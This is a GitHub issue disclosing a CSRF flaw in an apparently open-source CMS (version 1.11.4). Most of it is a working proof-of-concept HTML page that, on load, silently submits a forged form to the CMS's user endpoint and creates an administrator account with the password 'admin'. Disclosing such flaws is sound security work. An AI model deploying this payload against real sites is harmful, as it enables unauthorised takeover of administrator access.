Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a CSRF vulnerability that can add an administrator account #51

Closed
yaoyao6688 opened this issue Oct 13, 2019 · 0 comments
Closed
Assignees

Comments

@yaoyao6688
Copy link

CSRF vulnerability
There is a CSRF vulnerability to add an administrator account
After the administrator logged in, open the following page
poc
Hack.html-----add an administrator accoun

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
p.enctype ="multipart/form-data";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='username' value='admin' />";
fields += "<input type='hidden' name='email' value='1620449914&#64;qq&#46;com' />";  
fields += "<input type='hidden' name='pass' value='admin' />";  
fields += "<input type='hidden' name='userrole&#91;&#93;' value='1' />";  
fields += "<input type='hidden' name='active' value='1' />";  
var url = "http://192.168.0.103/cm/update_rows/user";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

Screenshots
1 Access dangerous pages
图片.png
图片.png
2 Found that an administrator has been added
图片.png
Impact version

  • Version [1.11.4]
@vzuburlis vzuburlis self-assigned this Oct 16, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants